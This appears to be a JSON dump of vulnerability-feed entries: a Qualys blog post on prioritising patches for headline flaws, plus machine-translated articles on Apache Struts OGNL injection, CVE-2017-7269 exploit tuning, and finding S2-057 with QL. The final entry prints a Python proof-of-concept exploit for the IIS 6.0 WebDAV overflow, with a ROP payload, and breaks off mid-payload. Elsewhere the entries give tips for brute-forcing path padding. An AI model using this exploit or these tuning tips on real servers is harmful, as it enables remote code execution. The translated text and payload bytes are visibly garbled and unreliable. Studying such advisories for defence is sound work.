bugs on a continuous basis, according to Langston.\n\nThis also means that when a high profile vulnerability is announced, security teams have a head start. That way, they don\u2019t have to go back to square one to ensure they are in fact identifying all assets before they can start to react.\n\nOrganizations will be able to pick the most appropriate course of action, which depending on the case, can be to patch right away, to mitigate when remediation is complex, or to monitor and wait before acting.\n\nBelow are three recent examples of each scenario.\n\n### Patch now, unless you \u201cwanna cry\u201d later\n\nMost organizations should have prioritized patching the vulnerability that was exploited by the WannaCry ransomware, way before the attack was unleashed, according to Langston. Instead, the [WannaCry attack](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) infected 300,000-plus systems and disrupted critical operations globally.\n\nMicrosoft disclosed the Windows vulnerability ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) in mid-March 2017 and made a patch available. At the time, Microsoft rated the vulnerability as \u201cCritical\u201d due to the potential for attackers to execute remote code in affected systems.\n\nThe vulnerability also had a number of other red flags that made it stand out as a particularly concerning one. In mid-April, the vulnerability became even more dangerous when the [Shadow Brokers hacker group](<https://blog.qualys.com/securitylabs/2017/04/15/the-shadow-brokers-release-zero-day-exploit-tools>) released an exploit for it called EternalBlue.\n\nSo organizations had a window of about two months to install the patch before WannaCry was unleashed in mid-May. Had most affected systems been patched, WannaCry\u2019s impact would have been minor.\n\n\u201cIn most cases, organizations that follow the standard patching cycle of 30 days, they were already protected. And two months in, you got a second shot at it,\u201d he said.\n\nLangston displayed a graph with Qualys vulnerability scanning data showing that between mid-March and mid-April, detection of affected devices spiked and gradually declined as organizations scanned and patched their systems.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/Slide13.jpg)\n\nHowever, the number of vulnerable systems shoots up after the EternalBlue release, after organizations apparently expanded the initial scope of scanned IT assets. \n\nAnd there\u2019s an important lesson here. \u201cWhen you\u2019re dealing with a vulnerability that can jump around your network, if you\u2019re not identifying all of the assets, you\u2019re already behind the eight ball,\u201d he said.\n\nThe graph shows that widespread patching didn\u2019t fully kick in until after the WannaCry attacks began.\n\nFom WannaCry, Langston identified some key no-nos: A slow identification of all at-risk assets; a tendency by IT operations teams to treat all issues with similar urgency; and a complacency among end users to delay rebooting their machines to finish the patching process.\n\n### Strut your firewall\n\nLangston then discussed the Struts web application vulnerability that was exploited most famously at Equifax, leading to that consumer credit reporting agency's massive data breach. On the same day that Struts was disclosed, and a patch made available, an exploit was also released, so the risk was high.\n\nBecause web application vulnerabilities tend to be difficult to remediate, often requiring a rebuild and long testing cycles, Struts highlights the importance of mitigation. In this case, a good plan would have been to use a[ web application firewall,](<https://blog.qualys.com/technology/2017/03/09/qualys-waf-2-0-protects-against-critical-apache-struts2-vulnerability-cve-2017-5638?>) while patching was in progress, he said. \n\n### Meltdown and Spectre: All bark and no bite?\n\nThen there are the Spectre and Meltdown vulnerabilities, which caused widespread alarm upon their disclosure in early January of this year, but for which there are only ineffective proof-of-concept exploits so far.\n\nIn the panic that was created, vendors such as Microsoft and Intel released faulty patches that IT departments rushed to apply, only to have to react after they caused system problems, including data corruption and performance issues.\n\nQualys data of vulnerability scans for Meltdown shows an initial push to install OS patches, followed by a long plateau of inactivity, as organizations probably weighed the fact that there were no exploits, and that the patches were problematic.\n\nA big lesson from Meltdown and Spectre? \u201cJust because it\u2019s in the news doesn\u2019t mean it\u2019s an emergency,\u201d Langston said. In other words, it\u2019s an example of a scenario where the most prudent thing to do is to monitor the situation and wait, instead of rushing to patch.\n\n### Best practices\n\nLangston recommends these six tips for crafting the best response to a notoriously public vulnerability:\n\n * Identify high-risk vulnerabilities often\n * Track the specific risk to your organization\n * Determine the best course of action\n * Decide when to communicate with internal stakeholders\n * Update regularly\n * Work the plan and improve it\n\nIt\u2019s also key to get buy-in from all the teams that will be involved in drafting, approving and executing the plan, including executives, security operations, DevOps, and IT operations. \u201cBuild the playbook together,\u201d he said.\n\nThe response plan should have four main elements:\n\n * Preparation, which involves ensuring that all assets are identified, that the triggers are documented and that the communication outreach is built\n * Reaction, which involves working the playbook, deciding on the course of action (fix, wait or mitigate), and communicating with your users\n * Revision, which involves reviewing the outcomes of the executed plan, and identifying improvement areas\n * Improvement, which involves collaboration to refine the response, modifying the plan based on findings, and extending the plan to all high-severity vulnerabilities\n\nThis should all amount to a rational, measured response, instead of to a knee-jerk reaction that leads to erratic, misguided decisions and actions.\n\n\u201cIf you don\u2019t have some response plan, you end up bouncing off of each other, pointing fingers and slowing down the entire process,\u201d he said.\n\nBelow is a checklist template that Langston suggests could be helpful in analyzing how to best respond to a \u201cheadline vulnerability\u201d.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/Slide36-1.jpg) \nHere\u2019s how that checklist might look when filled out by a hypothetical organization for the Meltdown vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/Slide37.jpg)\n\nThis information can also be enriched and expanded using automated dashboards with threat feeds and other resources that are updated in real time and that allow security teams to do in depth analysis of relevant data.\n\nThe goal is that in the face of a headline-blaring vulnerability, organizations can come up with a well thought and sensible plan. \u201cA methodical approach leads to a rational response,\u201d Langston said.", "cvss3": {}, "published": "2018-04-19T23:00:03", "type": "qualysblog", "title": "The Sky Is Falling! Responding Rationally to Headline Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-04-19T23:00:03", "id": "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "href": "https://blog.qualys.com/news/2018/04/19/the-sky-is-falling-responding-rationally-to-headline-vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2019-03-30T00:37:24", "description": "Through this article, we mainly learn how Apache Struts to achieve OGNL injection. Our examples will be set forth in the Struts of the two critical vulnerabilities: CVE-2017-5638\uff08Equifax information disclosure and CVE-2018-11776\u3002 \nApache Struts is a free open source framework for creating modern Java Web applications. Apache Struts has many serious vulnerabilities, one of its characteristics is to support OGNL object graph navigation language, which is also many loopholes is the main reason. \nOne vulnerability, CVE-2017-5638 directly leads to the 2017 Equifax information leakage, exposure to more than 1. 45 million US citizens personal information. Although the company's annual revenue more than 30 billion dollars, but they still did not escape the Apache Struts MVC framework of a known vulnerability attack. \nThis paper mainly introduces the Apache Struts, and then will guide us how to modify a simple application, the use of OGNL and achieve exploits. Next, we will study in depth the platform on a number of Public Exploit way, and try to use OGNL injection vulnerability. \nAlthough Java developers are familiar with Apache Struts, but the security community often does not do however, which is why we wrote this article for the reason. \nGetting started \nRunning a vulnerable Struts application need to install Apache Tomcat [Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>a). The package of the latest version can be downloaded here as a ZIP. The binary file decompress to a location of your choice we use/var/tomcat, and continues: \ncd /var/tomcat/bin # go to the unzipped folder \nchmod +x *. sh # set the script to executable file \n./ startup.sh # run the startup script \nOur visit to http://localhost:8080/, and check whether the site running. \nAfter the confirmation, we are ready to download the old version of the Apache Struts framework, which is vulnerable to our upcoming demo of the vulnerability attack. This page provides to meet our needs 2. 3. 30 version The Struts in. \nIn the extract compressed content, we should be in the/apps position seen under struts2-showcase. war file. This is one use of the Struts compiled and ready to deploy demo application. Just need the WAR file is copied to/var/tomcat/webapps, and access http://localhost:8080/struts2-showcase/showcase. action confirm whether it is valid. \n[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)the basics \nIf you have a good grasp of the Java Web applications related to simple concepts such as Servlets, then you would have been leading. If you are new to the Java Servlet knows nothing about, it can be understood simply as a component, its purpose is to create for in the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)hosted on Web applications the Web container, in addition, it is also responsible for the processing of the/struts2-showcase and other Java applications request. \nTo the processing Servlet, the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), for example Apache Tomcat requires some Assembly: \n1\\. Apache Coyote is to support the HTTP/1.1 Protocol connector. It allows the Servlet container components of Apache Catalina to communicate. \n2\\. Apache Catalina container when determined in the Tomcat receives an HTTP request, you need to call which the Servlet container. It will also HTTP request and response from the text is converted to a Servlet using a Java object. \n! [](/Article/UploadPic/2019-3/201933032655612. png) \nHere you can find information about the Java Servlet specification for all the details of the latest version 4. 0 in. \nApache Struts basics \nWith Java Web applications using the Apache Struts Framework application can have multiple Servlet. This article's main purpose is not to let everyone understand this to build the Web application framework, but on the surface the hang of the basic concepts. We can step-by-step tutorial on the subject. \nThe Apache Struts framework relies on MVC model-View-Controller architecture pattern. IT application very helpful, because you can separate the main application components: \n1\\. Model: represents the application data, for example, using\u201corders\u201dand other data of the class. \n2\\. View: is the output of the application, the visual part. \n3\\. The controller: receiving a user input, using the model to generate the view. \n4\\. Action Actions: the Apache Struts in the model. \n5\\. Intercept the Interceptors: the part of the controller, they can be in processing the request before or after the invocation of the hook. \n6\\. Value stack/OGNL: a set of objects, for example, model or action object. \n7\\. Result/result type: used to select business logic view. \n8\\. View of technology: the processing of data display. \nYou can see below the Apache Struts Web application General architecture: \n! [](/Article/UploadPic/2019-3/201933032655347.jpg) \nController receives the HTTP request, the FilterDispatcher is responsible for according to the request to invoke the right Operation. And then perform the operation, the view component is ready for a result and sends it to the HTTP response in the user. \nStruts application example \nYou want to start from scratch to write a Struts application takes some time, so we will use an already available rest-showcase demo application, which is a basic front-end a simple REST API. To compile the application, we only need to go into its directory and use Maven to compile: \ncd struts-2.3.30/src/apps/rest-showcase/ \nmvn package \nIn the target directory, we can find the following files: struts2-rest-showcase. war. You can copy it to the Tomcat server's webapps directory, for example:/var/tomcat/webapps to install it. \nThe following is the application source code: \n! [](/Article/UploadPic/2019-3/201933032655780. png) \nThe following are the available file description: \n1\\. Order. java is model, which is a storing order information of a Java class. \npublic class Order { \nString id; \nString clientName; \nint amount; \n... \n} \n2\\. OrdersService. java is a Helper class, which will be the Orders stored in the HashMap of the total, and its management. \npublic class OrdersService { \n\n\n**[1] [[2]](<93410_2.htm>) [[3]](<93410_3.htm>) [[4]](<93410_4.htm>) [[5]](<93410_5.htm>) [[6]](<93410_6.htm>) [next](<93410_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-03-30T00:00:00", "type": "myhack58", "title": "Apache Struts OGNL injection vulnerability principle with an example-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2019-03-30T00:00:00", "id": "MYHACK58:62201993410", "href": "http://www.myhack58.com/Article/html/3/62/2019/93410.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-07T03:19:41", "description": "Seen the analysis, to talk about the use of a few tips.\n\n1. Vulnerability scope\n\nThe original poc above wrote only applies to the 03 r2, in fact, the most common of 03 sp2 can also be directly reproduced, so it seems that the attack range is very large, after all, the domestic selling most of the 03 are Enterprise Edition sp2.\n\nTest the English version 03 sp2 the same success, more version no environmental testing.\n\n2. Vulnerability unsuccessful problem\n\nThrowing away all can not use the problem aside, when the conditions are met, may also have a four-point lead to failure, in I degree reverse order.\n\nThe first point is the port and the domain binding issue:\n\nIn General, the local test directly to the iis's default site to start with, the default site does not have any binding, it will not appear any problems.\n\nAnd in fact, and in the http header HOST field the same, If header information in the two url is requested and the site is bound to match, and must domain name and port match exactly, otherwise only receive a 502 in.\n\n! [](/Article/UploadPic/2017-4/20174710552788. png)\n\nFor example, test a Only binding the port 8080 of the site you want to http://localhost:8080/, the \u6d4b\u8bd5 \u7ed1\u5b9a \u57df\u540d \u4e3a zcgonvh.com, port 8888 of the site you want to http://zcgonvh. com:8888/etc.\n\nOf course, the Exp is not affected:\n\n! [](/Article/UploadPic/2017-4/20174710552543. png)\n\nTest of time Be careful: when you have finished modifying the configuration, please restart the iis, or does not exceed the Disable threshold under the premise of the end of the w3wp process. Below those who need to modify the iis configuration to do the test.\uff09\n\nThe second point is the 64-bit issues, although not common, but 03 there is really 64-bit.\n\n64-bit pool is actually okay, SEH will handle the exception, does not cause the crash:\n\n! [](/Article/UploadPic/2017-4/20174710552905. png)\n\nAnd if on a 32-bit application pool, it will cause the crash:\n\n! [](/Article/UploadPic/2017-4/20174710552980. png)\n\nDebugging found that the error appears in the ROP chain, the client connection will be directly disconnected and no data is returned.\n\nSolution: change the ROP.\n\n64-bit 03 after all is not much, experience of time besides.\n\nSo the 32-bit environment you can use the following way to build: a\n\n\ncscript. exe %SYSTEMDRIVE%\\inetpub\\adminscripts\\adsutil. vbs SET W3SVC/AppPools/Enable32bitAppOnWin64 1\niisreset\n\nAfter closing all the web Service Extension, \u6dfb\u52a0\u4e00\u4e2a\u65b0\u6269\u5c55\u6307\u5411%systemroot%\\syswow64\\inetsrv\\httpext.dll and enabled.\n\n! [](/Article/UploadPic/2017-4/20174710552701. png)\n\nThe third point is the physical path of the problem, Yes, that's the physical path.\n\nAccording to the analysis in the article [CVE-2017-7269 IIS6. 0 remote code execution vulnerability analysis and Exploit](<http://whereisk0shl.top/cve-2017-7269-iis6-interesting-exploit.html>) for debugging, you can see for covering the buffer:\n\n! [](/Article/UploadPic/2017-4/20174710552202. png)\n\nObviously, this is If the head in the first Url through the MapPath obtained after the physical path, not the default path for the directory length including the trailing backslash is not 19, then the error is inevitable.\n\nThe second Url is the same, if because of this error, will return a 500 error.\n\n! [](/Article/UploadPic/2017-4/20174710552330. png)\n\nThe solution is simple: change the length of the can.\n\nPath of less than 19 can simply be added:\n\n! [](/Article/UploadPic/2017-4/20174710552563. png)\n\nWhile the actual path is often greater than 19, the need for padding to delete. ROP and stackpivot in front of the padding is actually UTF8 encoded characters, each of the three bytes after decoding becomes two bytes of the UTF16 character, to ensure the Exp is not the case of an error, there 0x58 characters is useless. So can the front 0x108 bytes deleted, and replaced with 0x58 an a or b.\n\nThe last Poc is roughly like this:\n\n! [](/Article/UploadPic/2017-4/20174710553564. png)\n\nReally want to achieve a stable remote use of the words, but also the need for the physical path length of the blasting.\n\nThe red box is 103 a, The physical path is c:\\inetpub\\, the add up to of 114. Remove the drive letter, and left 111 in. So you can put Exp of the padding is increased to 111, and the successive reduction. When the length does not match the return of 500, is successful when the natural return of 200.\n\n! [](/Article/UploadPic/2017-4/20174710553670. png)\n\nIn General the physical path length of more than 114 sites almost nothing, sufficient. If by some way disclose the physical path of the words, with 114 minus the physical path length, including the end of the backslash is the required padding length.\n\nThe last point, also is the most pit father's place: the timeout problem.\n\nThe simple point is that when the exp is executed successfully after a period of time (probably ten minutes to twenty minutes or so, during which no matter whether the access is windbg the pending time does not count), and then on this site to perform the exp will never be successful, at the same time returns to 400.\n\nIf the w3wp hang a debugger, you can see there was an access violation, of course, since SEH does not cause the site to hang out.\n\n! [](/Article/UploadPic/2017-4/20174710553390. png)\n\nAt this time the site is in the same pool the other sites would all hang out, http code of 500, the error message parameter incorrect:\n\n**[1] [[2]](<85039_2.htm>) [next](<85039_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-07T00:00:00", "type": "myhack58", "title": "CVE-2017-7269 a few tips and BUG fixes-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7269"], "modified": "2017-04-07T00:00:00", "id": "MYHACK58:62201785039", "href": "http://www.myhack58.com/Article/html/3/62/2017/85039.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-23T14:31:31", "description": "! [](/Article/UploadPic/2018-8/2018823153022212.jpg) \n2018 4 months, I to Apache Struts and the Struts security team reported a new remote code execution vulnerability--CVE-2018-11776\uff08S2-057 in to do some configuration on a server running Struts, and can be accessed via the carefully constructed URL to trigger the vulnerability. This discovery is I the Apache Struts ongoing Safety study of part. In this article, I will describe my discovery of a vulnerability and how to exploit the previous vulnerability information to get the Struts internal working of the principle, create a package Struts-specific concept of the QL query. Run these queries will highlight the problematic code results. These works are hosted on GitHub, later we will also to this repository add more query statement and database to help the Struts and other projects of the security research. \n\nMapping the attack surface \nMany security vulnerabilities are addressed from untrusted sources such as user input stream to a particular location of the sink of the data, and the data using an unsafe way-for example, the SQL query, deserialize, and some other interpreted languages, etc., QL can easily search for such vulnerabilities. You just need to describe the various source and sink, and then let the DataFlow library to accomplish these things. For a particular project, began to investigate such issues, a good method is to view the older version of the software known vulnerabilities. This can be in-depth understanding you want to find the source and sink points. \nThis vulnerability discovery process, I first see a RCE vulnerability S2-032\uff08CVE-2016-3081\uff09, S2-033\uff08CVE-2016-3687 and S2-037\uff08CVE-2016-4438-in. With Struts in many other RCE as RCE relates to the untrusted input is converted to OGNL expressions, allowing an attacker on the server to run arbitrary code. These three vulnerabilities are particularly interesting, not only do they let us on the Struts of the internal working mechanism have some understanding, and these three vulnerabilities actually is the same, also repair three back! \nThese three issues are the remote input through the variable methodName as a method of parameter passing caused OgnlUtil::getValue(). \n! [](/Article/UploadPic/2018-8/2018823153022696. png) \nHere the proxy has ActionProxy type, it is an interface. Note that the definition of it, in addition to the method getMethod\uff08\uff09\uff08in the above code is used to assign a value to the variable methodName addition, there are a variety of methods, such as getActionName\uff08\uff09and getNamespace\uff08\uff09\u3002 These methods look like from the URL to return information, so I'll just assume that all of these methods may return untrusted input. The rear of the article I will in depth research I for these the input from where the investigation.\uff09 \nNow use QL to start on these untrusted source modeling: \n! [](/Article/UploadPic/2018-8/2018823153023567. png) \n\nIdentify the OGNL sink point \nNow that we have identified and described some of the non-trusted source, the next step is to sink the point of doing the same thing. As previously mentioned, many of Struts RCE relates to the remote input parsed for OGNL expressions. Struts has many function will eventually be their arguments as OGNL expressions; for we in this article the start of the three vulnerabilities, the use of a OgnlUtil :: getValue \uff08\uff09, but in the vulnerability S2-045\uff08CVE-2017-5638, using TextParseUtil :: translateVariables\uff08\uff09\u3002 We may be looking for execution of OGNL expressions commonly used function, I feel OgnlUtil :: compileAndExecute\uff09and OgnlUtl :: compileAndExecuteMethod\uff08\uff09looks more games. \nMy description: \n! [](/Article/UploadPic/2018-8/2018823153023415. png) \n\nThe first attempt \nNow we have in QL are defined in the source and sink, we can stain the tracking query using these definitions. By defining DataFlow configured to use the DataFlow library: \n! [](/Article/UploadPic/2018-8/2018823153023702. png) \nHere is what I used before defined isActionProxySource and isOgnlSink it. \nNote that I'm here to reload the isAdditionalFlowStep, so that it can allow me to contain the pollution data is propagated to the additional step. Such as allow me to the project-specific information into the flow configuration. For example, if I have by a network of communicating components, I may be in QL as described in those various network-side code is what allows the DataFlow library to track tainted data. \nFor this particular query, I added two additional process steps for the DataFlow library. First: \n! [](/Article/UploadPic/2018-8/2018823153026173. png) \nIt includes tracking the standard Java library calls, string manipulation, etc. of the standard QL TaintTracking library steps. The second Add is an approximate value, allow me to by a field access track tainted data: \n! [](/Article/UploadPic/2018-8/2018823153026186. png) \nThat is if the field is assigned a tainted value, then as long as the two expressions are the same type of method call, the field visit will also be regarded as pollution. See the following example: \n! [](/Article/UploadPic/2018-8/2018823153026144. png) \nSeen from above, the bar in this. field access may not always be contaminated. For example, if in the bar before not to call foo\uff08\uff09\u3002 Therefore, we are not in the default DataFlow :: Configuration contained in this step, because you cannot guarantee that the data always in this manner the flow, however, for digging vulnerabilities, I think adding this very useful. In later posts I will share some of the similar to the other process steps, these steps for find the bug helpful, but for similar reasons, the default case is not included these steps. \n\nThe initial results and Refine the query \nI'm on the latest version of the source code on the run a bit with QL, found that due to the S2-032, S2-033 S2-037 is still marked. These vulnerabilities obviously already been fixed, why still will be reported problem? \n\n\n**[1] [[2]](<91264_2.htm>) [[3]](<91264_3.htm>) [next](<91264_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-08-23T00:00:00", "type": "myhack58", "title": "S2-057 vulnerability in the original author's README: how to use automated tools find 5 RCE-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4438", "CVE-2017-5638", "CVE-2018-11776", "CVE-2016-3687", "CVE-2016-3081"], "modified": "2018-08-23T00:00:00", "id": "MYHACK58:62201891264", "href": "http://www.myhack58.com/Article/html/3/62/2018/91264.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-28T17:18:36", "description": "Vulnerability description\nMicrosoft has confirmed the vulnerabilities: Windows Server 2003R2 version IIS6. 0 the WebDAV service in the ScStoragePathFromUrl a function of the presence buffer overflow vulnerability, the remote attacker through to the\u201cIf: \nSince the opening the WebDAV service on the vulnerability exists, so for now the IIS 6.0 users, the available workaround is to turn off the WebDAV service. \nVulnerability number\nCVE-2017-7269 \nOther information\nScStoragePathFromUrl function is called twice\nImpact version\nWindows Server 2003 R2 \nAttack vector\nModified PROFIND data \nVulnerability discovery\nZhiniang Peng and Chen Wu\uff08South China University of technology Computer Science and engineering information security laboratory \nPoC \n#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous. \n#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China \n#-----------Email: edwardz@foxmail.com \nimport socket \nsock = socket. socket(socket. AF_INET, socket. SOCK_STREAM) \nsock. connect(('127.0.0.1',80)) \npay='PROPFIND / HTTP/1.1\\r\\nHost: localhost\\r\\nContent-Length: 0\\r\\n' \npay+='If: \npay+='\\xe6\\xbd\\xa8\\xe7\\xa1\\xa3\\xe7\\x9d\\xa1\\xe7\\x84\\xb3\\xe6\\xa4\\xb6\\xe4\\x9d\\xb2\\xe7\\xa8\\xb9\\xe4\\xad\\xb7\\xe4\\xbd\\xb0\\xe7\\x95\\x93\\xe7\\xa9\\x8f\\xe4\\xa1\\xa8\\xe5\\x99\\xa3\\xe6\\xb5\\x94\\xe6\\xa1\\x85\\the XE3\\xa5\\x93\\xe5\\x81\\xac\\xe5\\x95\\xa7\\xe6\\x9d\\xa3\\ the XE3\\x8d\\xa4\\xe4\\x98\\xb0\\xe7\\xa1\\x85\\xe6\\xa5\\x92\\xe5\\x90\\xb1\\xe4\\xb1\\x98\\xe6\\xa9\\x91\\xe7\\x89\\x81\\xe4\\x88\\xb1\\xe7\\x80\\xb5\\xe5\\xa1\\x90\\the XE3\\x99\\xa4\\xe6\\xb1\\x87\\the XE3\\x94\\xb9\\xe5\\x91\\xaa\\xe5\\x80\\xb4\\xe5\\x91\\x83\\xe7\\x9d\\x92\\xe5\\x81\\xa1\\the XE3\\x88\\xb2\\ xe6\\xb5\\x8b\\xe6\\xb0\\xb4\\the XE3\\x89\\x87\\xe6\\x89\\x81\\the XE3\\x9d\\x8d\\xe5\\x85\\xa1\\xe5\\xa1\\xa2\\xe4\\x9d\\xb3\\xe5\\x89\\x90\\the XE3\\x99\\xb0\\xe7\\x95\\x84\\xe6\\xa1\\xaa\\the XE3\\x8d\\xb4\\xe4\\xb9\\x8a\\xe7\\xa1\\xab\\xe4\\xa5\\xb6\\xe4\\xb9\\xb3\\xe4\\xb1\\xaa\\xe5\\x9d\\xba\\xe6\\xbd\\xb1\\ xe5\\xa1\\x8a\\the XE3\\x88\\xb0\\the XE3\\x9d\\xae\\xe4\\xad\\x89\\xe5\\x89\\x8d\\xe4\\xa1\\xa3\\xe6\\xbd\\x8c\\xe7\\x95\\x96\\xe7\\x95\\xb5\\xe6\\x99\\xaf\\xe7\\x99\\xa8\\xe4\\x91\\x8d\\xe5\\x81\\xb0\\xe7\\xa8\\xb6\\xe6\\x89\\x8b\\xe6\\x95\\x97\\xe7\\x95\\x90\\xe6\\xa9\\xb2\\xe7\\xa9\\xab\\xe7\\x9d\\xa2\\ xe7\\x99\\x98\\xe6\\x89\\x88\\xe6\\x94\\xb1\\the XE3\\x81\\x94\\xe6\\xb1\\xb9\\xe5\\x81\\x8a\\xe5\\x91\\xa2\\xe5\\x80\\xb3\\the XE3\\x95\\xb7\\xe6\\xa9\\xb7\\xe4\\x85\\x84\\the XE3\\x8c\\xb4\\xe6\\x91\\xb6\\xe4\\xb5\\x86\\xe5\\x99\\x94\\xe4\\x9d\\xac\\xe6\\x95\\x83\\xe7\\x98\\xb2\\xe7\\x89\\xb8\\xe5\\x9d\\xa9\\ xe4\\x8c\\xb8\\xe6\\x89\\xb2\\xe5\\xa8\\xb0\\xe5\\xa4\\xb8\\xe5\\x91\\x88\\xc8\\x82\\xc8\\x82\\xe1\\x8b\\x80\\xe6\\xa0\\x83\\xe6\\xb1\\x84\\xe5\\x89\\x96\\xe4\\xac\\xb7\\xe6\\xb1\\xad\\xe4\\xbd\\x98\\xe5\\xa1\\x9a\\xe7\\xa5\\x90\\xe4\\xa5\\xaa\\xe5\\xa1\\x8f\\xe4\\xa9\\x92\\xe4\\x85\\x90\\xe6\\x99\\ x8d\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe4\\xa0\\xb4\\xe6\\x94\\xb1\\xe6\\xbd\\x83\\xe6\\xb9\\xa6\\xe7\\x91\\x81\\xe4\\x8d\\xac\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe5\\x8d\\x83\\xe6\\xa9\\x81\\xe7\\x81\\x92\\the XE3\\x8c\\xb0\\xe5\\xa1\\xa6\\xe4\\x89\\x8c\\xe7\\x81\\x8b\\xe6\\x8d\\x86\\xe5\\x85\\xb3\\xe7\\xa5\\ x81\\xe7\\xa9\\x90\\xe4\\xa9\\xac' \npay+='>' \npay+=' (Not ) \npay+='\\xe7\\xa5\\x88\\xe6\\x85\\xb5\\xe4\\xbd\\x83\\xe6\\xbd\\xa7\\xe6\\xad\\xaf\\xe4\\xa1\\x85\\the XE3\\x99\\x86\\xe6\\x9d\\xb5\\xe4\\x90\\xb3\\the XE3\\xa1\\xb1\\xe5\\x9d\\xa5\\xe5\\xa9\\xa2\\xe5\\x90\\xb5\\xe5\\x99\\xa1\\xe6\\xa5\\x92\\xe6\\xa9\\x93\\xe5\\x85\\x97\\the XE3\\xa1\\x8e\\xe5\\xa5\\x88\\ xe6\\x8d\\x95\\xe4\\xa5\\xb1\\xe4\\x8d\\xa4\\xe6\\x91\\xb2\\the XE3\\x91\\xa8\\xe4\\x9d\\x98\\xe7\\x85\\xb9\\the XE3\\x8d\\xab\\xe6\\xad\\x95\\xe6\\xb5\\x88\\xe5\\x81\\x8f\\xe7\\xa9\\x86\\the XE3\\x91\\xb1\\xe6\\xbd\\x94\\xe7\\x91\\x83\\xe5\\xa5\\x96\\xe6\\xbd\\xaf\\xe7\\x8d\\x81\\the XE3\\x91\\x97\\xe6\\x85\\xa8\\ xe7\\xa9\\xb2\\the 